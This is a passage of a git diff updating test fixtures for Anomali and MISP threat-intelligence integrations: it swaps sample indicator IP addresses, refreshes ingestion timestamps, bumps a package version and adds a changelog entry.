"enrichment" @@ -3486,7 +3486,7 @@ "last_seen": "2020-10-09T18:34:17.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "192.0.2.13", + "ip": "192.168.2.13", "type": "url", "url": { "path": "/ox1etvpch/6h-6v", @@ -3500,7 +3500,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138746109Z", + "ingested": "2021-12-13T08:39:43.810173600Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3554,7 +3554,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138748133Z", + "ingested": "2021-12-13T08:39:43.810179800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3610,7 +3610,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138749766Z", + "ingested": "2021-12-13T08:39:43.810184Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3665,7 +3665,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138751419Z", + "ingested": "2021-12-13T08:39:43.810189300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3721,7 +3721,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138753213Z", + "ingested": "2021-12-13T08:39:43.810196800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3777,7 +3777,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138754946Z", + "ingested": "2021-12-13T08:39:43.810217700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3833,7 +3833,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138756649Z", + "ingested": "2021-12-13T08:39:43.810222700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3881,13 +3881,13 @@ "last_seen": "2020-10-09T18:34:41.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "203.0.113.106", + "ip": "192.168.113.106", "type": "ipv4-addr" } }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138758352Z", + "ingested": "2021-12-13T08:39:43.810226800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3935,7 +3935,7 @@ "last_seen": "2020-10-09T18:34:43.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "203.0.113.160", + "ip": "192.168.113.160", "type": "url", "url": { "path": "/5fwsxlb1m/oshqs0", @@ -3949,7 +3949,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138761328Z", + "ingested": "2021-12-13T08:39:43.810232Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4004,7 +4004,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138763121Z", + "ingested": "2021-12-13T08:39:43.810236300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4058,7 +4058,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138764905Z", + "ingested": "2021-12-13T08:39:43.810242700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4112,7 +4112,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138766648Z", + "ingested": "2021-12-13T08:39:43.810248700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4160,7 +4160,7 @@ "last_seen": "2020-10-09T18:34:54.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "2001:db8:5bc2:f783:9677:ba10:5335:c6ed", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "url", "url": { "path": "/zkj1wr/ms2dq", @@ -4174,7 +4174,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138768411Z", + "ingested": "2021-12-13T08:39:43.810253100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4228,7 +4228,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138770114Z", + "ingested": "2021-12-13T08:39:43.810258200Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4283,7 +4283,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138772258Z", + "ingested": "2021-12-13T08:39:43.810265800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4337,7 +4337,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138773982Z", + "ingested": "2021-12-13T08:39:43.810270100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4386,7 +4386,7 @@ "last_seen": "2020-10-09T18:35:04.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "203.0.113.111", + "ip": "192.168.113.111", "type": "url", "url": { "path": "/29j3q7kc/4l0za3s", @@ -4400,7 +4400,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138775785Z", + "ingested": "2021-12-13T08:39:43.810304900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4454,7 +4454,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138777639Z", + "ingested": "2021-12-13T08:39:43.810313700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4511,7 +4511,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138779392Z", + "ingested": "2021-12-13T08:39:43.810318200Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4559,7 +4559,7 @@ "last_seen": "2020-10-09T18:44:01.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "192.0.2.245", + "ip": "192.168.2.245", "type": "url", "url": { "path": "/ffey/ugwd", @@ -4573,7 +4573,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138781105Z", + "ingested": "2021-12-13T08:39:43.810322300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4581,10 +4581,10 @@ "tags": [ "preserve_original_event", "first_seen=2020-02-19T16:22:26", - "IP=203.0.113.146", + "IP=192.168.113.146", "qve", "9hq86cl", - "mask=192.0.2.145", + "mask=192.168.2.145", "popularity=medium" ] }, @@ -4627,7 +4627,7 @@ "last_seen": "2020-10-09T18:44:04.000Z", "provider": "Phony generated indicator", "confidence": "None", - "ip": "2001:db8:9649:f32a:78d6:6c97:4fc0:b811", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "url", "url": { "path": "/mankgvtpl/1suq", @@ -4641,7 +4641,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138782798Z", + "ingested": "2021-12-13T08:39:43.810327100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4694,7 +4694,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138784521Z", + "ingested": "2021-12-13T08:39:43.810332900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4742,13 +4742,13 @@ "last_seen": "2020-10-09T18:44:27.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "203.0.113.178", + "ip": "192.168.113.178", "type": "ipv4-addr" } }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138786235Z", + "ingested": "2021-12-13T08:39:43.810338100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4756,10 +4756,10 @@ "tags": [ "preserve_original_event", "first_seen=2020-11-03T00:44:45", - "IP=203.0.113.133", + "IP=192.168.113.133", "a7ampeh8", "3-9hj92", - "mask=203.0.113.177", + "mask=192.168.113.177", "popularity=high" ] }, @@ -4801,7 +4801,7 @@ "last_seen": "2020-10-09T18:44:35.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "192.0.2.140", + "ip": "192.168.2.140", "type": "url", "url": { "path": "/yw7fom/x6xp", @@ -4815,7 +4815,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138787888Z", + "ingested": "2021-12-13T08:39:43.810342800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4863,7 +4863,7 @@ "last_seen": "2020-10-09T18:44:36.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "192.0.2.20", + "ip": "192.168.2.20", "type": "url", "url": { "path": "/2vgsz9a/9tzk9", @@ -4877,7 +4877,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138789611Z", + "ingested": "2021-12-13T08:39:43.810346900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4926,7 +4926,7 @@ "last_seen": "2020-10-09T18:44:37.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "2001:db8:6258:f48d:45ff:2bd1:5197:ad78", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "url", "url": { "path": "/-upwetee4/-e5xph-c", @@ -4940,7 +4940,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138791284Z", + "ingested": "2021-12-13T08:39:43.810351Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4948,10 +4948,10 @@ "tags": [ "preserve_original_event", "first_seen=2020-04-13T09:30:20", - "IP=203.0.113.221", + "IP=192.168.113.221", "ciib", "o2d", - "mask=192.0.2.110", + "mask=192.168.2.110", "popularity=high" ] }, @@ -4994,7 +4994,7 @@ "last_seen": "2020-10-09T18:44:45.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "203.0.113.98", + "ip": "192.168.113.98", "type": "url", "url": { "path": "/6scni2kd/8-0olo", @@ -5008,7 +5008,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138792947Z", + "ingested": "2021-12-13T08:39:43.810355Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5056,13 +5056,13 @@ "last_seen": "2020-10-09T18:44:47.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "2001:db8:2f2:8667:b63b:cb11:fd16:e637", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "ipv6-addr" } }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138794811Z", + "ingested": "2021-12-13T08:39:43.810359100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5073,7 +5073,7 @@ "IP=2001:db8:12ee:5479:f7f8:33e8:1477:6866", "jsk", "v2mi3w1", - "mask=192.0.2.15", + "mask=192.168.2.15", "popularity=medium" ] }, @@ -5114,7 +5114,7 @@ "last_seen": "2020-10-09T18:44:50.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "192.0.2.83", + "ip": "192.168.2.83", "type": "domain-name", "url": { "domain": "ekxj6l29.example.org" @@ -5123,7 +5123,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138796965Z", + "ingested": "2021-12-13T08:39:43.810363100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5133,7 +5133,7 @@ "first_seen=2020-11-03T12:54:48", "-eqch6ly", "rzzt0o", - "mask=192.0.2.54", + "mask=192.168.2.54", "popularity=high" ] }, @@ -5184,7 +5184,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138798668Z", + "ingested": "2021-12-13T08:39:43.810367300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5194,7 +5194,7 @@ "first_seen=2020-07-22T05:31:21", "dq1kmq", "ldv0d", - "mask=203.0.113.252", + "mask=192.168.113.252", "popularity=high" ] }, @@ -5236,7 +5236,7 @@ "last_seen": "2020-10-09T18:44:54.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "203.0.113.162", + "ip": "192.168.113.162", "type": "url", "url": { "path": "/kkbk-6/59l79x", @@ -5250,7 +5250,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138800501Z", + "ingested": "2021-12-13T08:39:43.810371300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5297,7 +5297,7 @@ "last_seen": "2020-10-09T18:44:58.000Z", "provider": "Phony generated indicator", "confidence": "None", - "ip": "203.0.113.92", + "ip": "192.168.113.92", "type": "url", "url": { "path": "/nfdi/hied", @@ -5311,7 +5311,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138802124Z", + "ingested": "2021-12-13T08:39:43.810375700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5358,13 +5358,13 @@ "last_seen": "2020-10-09T18:45:05.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "192.0.2.100", + "ip": "192.168.2.100", "type": "ipv4-addr" } }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138803878Z", + "ingested": "2021-12-13T08:39:43.810379800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5372,10 +5372,10 @@ "tags": [ "preserve_original_event", "first_seen=2020-02-24T00:46:01", - "IP=192.0.2.44", + "IP=192.168.2.44", "or81", "2rukgaof3", - "mask=203.0.113.238", + "mask=192.168.113.238", "popularity=high" ] }, @@ -5428,13 +5428,13 @@ "last_seen": "2021-04-19T08:57:46.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "192.0.2.16", + "ip": "192.168.2.16", "type": "ipv4-addr" } }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138805651Z", + "ingested": "2021-12-13T08:39:43.810384100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5476,13 +5476,13 @@ "last_seen": "2021-04-29T16:02:17.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "203.0.113.33", + "ip": "192.168.113.33", "type": "ipv4-addr" } }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138807374Z", + "ingested": "2021-12-13T08:39:43.810388200Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5526,13 +5526,13 @@ "last_seen": "2021-04-29T16:02:23.000Z", "provider": "Phony generated indicator", "confidence": "None", - "ip": "192.0.2.180", + "ip": "192.168.2.180", "type": "ipv4-addr" } }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138808977Z", + "ingested": "2021-12-13T08:39:43.810392300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5574,13 +5574,13 @@ "last_seen": "2021-04-29T16:02:24.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "2001:db8:692e:9d99:e3f2:e52d:753a:d1e", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "ipv6-addr" } }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138810751Z", + "ingested": "2021-12-13T08:39:43.810396300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5624,13 +5624,13 @@ "last_seen": "2021-04-29T16:02:25.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "203.0.113.116", + "ip": "192.168.113.116", "type": "ipv4-addr" } }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138812524Z", + "ingested": "2021-12-13T08:39:43.810401900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5673,13 +5673,13 @@ "last_seen": "2021-04-29T16:02:25.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "192.0.2.73", + "ip": "192.168.2.73", "type": "ipv4-addr" } }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138814137Z", + "ingested": "2021-12-13T08:39:43.810406200Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5723,13 +5723,13 @@ "last_seen": "2021-04-29T16:02:26.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "203.0.113.197", + "ip": "192.168.113.197", "type": "ipv4-addr" } }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138815830Z", + "ingested": "2021-12-13T08:39:43.810411300Z", "category": "threat", "type": "indicator", "kind": "enrichment" diff --git a/packages/ti_anomali/manifest.yml b/packages/ti_anomali/manifest.yml index eeb00a981ca..43ac7d2e8a8 100644 --- a/packages/ti_anomali/manifest.yml +++ b/packages/ti_anomali/manifest.yml @@ -1,6 +1,6 @@ name: ti_anomali title: Anomali -version: 1.1.1 +version: 1.1.2 release: ga description: Collect threat intelligence from Anomali APIs with Elastic Agent. type: integration diff --git a/packages/ti_misp/changelog.yml b/packages/ti_misp/changelog.yml index a7500fcae6c..5155d19a874 100644 --- a/packages/ti_misp/changelog.yml +++ b/packages/ti_misp/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.2" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.0.1" changes: - description: Bump minimum version diff --git a/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-attributes-ndjson.log-expected.json b/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-attributes-ndjson.log-expected.json index 3ea95be1883..f21e045dee6 100644 --- a/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-attributes-ndjson.log-expected.json +++ b/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-attributes-ndjson.log-expected.json @@ -60,7 +60,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827750004Z", + "ingested": "2021-12-09T13:49:02.948915100Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload installation\",\"comment\":\"Contextual comment for the file md5 attribute\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3631\",\"first_seen\":null,\"id\":\"266258\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621588162\",\"to_ids\":false,\"type\":\"md5\",\"uuid\":\"34c59b06-d35d-4808-919c-4b452f185c52\",\"value\":\"70461da8b94c6ca5d2fda3260c5a8c3b\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"analysis\":\"0\",\"date\":\"2021-05-21\",\"distribution\":\"1\",\"id\":\"3633\",\"info\":\"Test event 3 objects and attributes\",\"org_id\":\"1\",\"orgc_id\":\"1\",\"published\":false,\"threat_level_id\":\"1\",\"timestamp\":\"1621592532\",\"uuid\":\"4edb20c7-8175-484d-bdcd-fce6872c1ef3\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"1\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3631\",\"info\":\"Test event 1 just atrributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621588162\",\"uuid\":\"8ca56ae9-3747-4172-93d2-808da1a4eaf3\"}}", "category": "threat", "type": "indicator", @@ -136,7 +136,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827777676Z", + "ingested": "2021-12-09T13:49:02.948923600Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"Artefact dropped for test 2\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3632\",\"first_seen\":null,\"id\":\"266259\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621588675\",\"to_ids\":true,\"type\":\"md5\",\"uuid\":\"73102a1c-7432-47b7-9644-6f9d46b6887c\",\"value\":\"60461da8b94c6ca5d2fda3260c5a8c3b\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"2\",\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"analysis\":\"2\",\"date\":\"2018-03-26\",\"distribution\":\"3\",\"id\":\"684\",\"info\":\"OSINT - Forgot About Default Accounts? No Worries, GoScanSSH Didn’t\",\"org_id\":\"1\",\"orgc_id\":\"2\",\"published\":true,\"threat_level_id\":\"3\",\"timestamp\":\"1523865236\",\"uuid\":\"5acdb4d0-b534-4713-9612-4a1d950d210f\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"4\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3632\",\"info\":\"Test event 2 just more atrributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"2\",\"timestamp\":\"1621588836\",\"uuid\":\"efbca287-edb5-4ad7-b8e4-fe9da514a763\"}}", "category": "threat", "type": "indicator", @@ -210,7 +210,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827786984Z", + "ingested": "2021-12-09T13:49:02.948930100Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Network activity\",\"comment\":\"Conext for domain type attribute event 2\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3632\",\"first_seen\":null,\"id\":\"266260\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621588744\",\"to_ids\":true,\"type\":\"domain\",\"uuid\":\"a52a1b47-a580-4f33-96ba-939cf9146c9b\",\"value\":\"baddom.madeup.local\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"2\",\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"analysis\":\"2\",\"date\":\"2018-03-26\",\"distribution\":\"3\",\"id\":\"684\",\"info\":\"OSINT - Forgot About Default Accounts? No Worries, GoScanSSH Didn’t\",\"org_id\":\"1\",\"orgc_id\":\"2\",\"published\":true,\"threat_level_id\":\"3\",\"timestamp\":\"1523865236\",\"uuid\":\"5acdb4d0-b534-4713-9612-4a1d950d210f\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"4\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3632\",\"info\":\"Test event 2 just more atrributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"2\",\"timestamp\":\"1621588836\",\"uuid\":\"efbca287-edb5-4ad7-b8e4-fe9da514a763\"}}", "category": "threat", "type": "indicator", @@ -282,7 +282,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827794127Z", + "ingested": "2021-12-09T13:49:02.948935Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Network activity\",\"comment\":\"Ip-src attribute context for event2\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3632\",\"first_seen\":null,\"id\":\"266261\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621588800\",\"to_ids\":false,\"type\":\"ip-src\",\"uuid\":\"3dbf224b-7c84-4c4b-9f95-80f28954bd10\",\"value\":\"10.0.0.1\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"2\",\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"analysis\":\"2\",\"date\":\"2018-03-26\",\"distribution\":\"3\",\"id\":\"684\",\"info\":\"OSINT - Forgot About Default Accounts? No Worries, GoScanSSH Didn’t\",\"org_id\":\"1\",\"orgc_id\":\"2\",\"published\":true,\"threat_level_id\":\"3\",\"timestamp\":\"1523865236\",\"uuid\":\"5acdb4d0-b534-4713-9612-4a1d950d210f\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"4\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3632\",\"info\":\"Test event 2 just more atrributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"2\",\"timestamp\":\"1621588836\",\"uuid\":\"efbca287-edb5-4ad7-b8e4-fe9da514a763\"}}", "category": "threat", "type": "indicator", @@ -354,7 +354,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827800189Z", + "ingested": "2021-12-09T13:49:02.948939300Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Network activity\",\"comment\":\"ip-dst context for event id 2\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3632\",\"first_seen\":null,\"id\":\"266262\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621588836\",\"to_ids\":true,\"type\":\"ip-dst\",\"uuid\":\"db4bfd36-7374-4f8c-9031-60e56d4bba30\",\"value\":\"192.168.1.50\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"2\",\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"analysis\":\"2\",\"date\":\"2018-03-26\",\"distribution\":\"3\",\"id\":\"684\",\"info\":\"OSINT - Forgot About Default Accounts? No Worries, GoScanSSH Didn’t\",\"org_id\":\"1\",\"orgc_id\":\"2\",\"published\":true,\"threat_level_id\":\"3\",\"timestamp\":\"1523865236\",\"uuid\":\"5acdb4d0-b534-4713-9612-4a1d950d210f\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"4\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3632\",\"info\":\"Test event 2 just more atrributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"2\",\"timestamp\":\"1621588836\",\"uuid\":\"efbca287-edb5-4ad7-b8e4-fe9da514a763\"}}", "category": "threat", "type": "indicator", @@ -445,7 +445,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827807572Z", + "ingested": "2021-12-09T13:49:02.948944Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"filename contect for test event 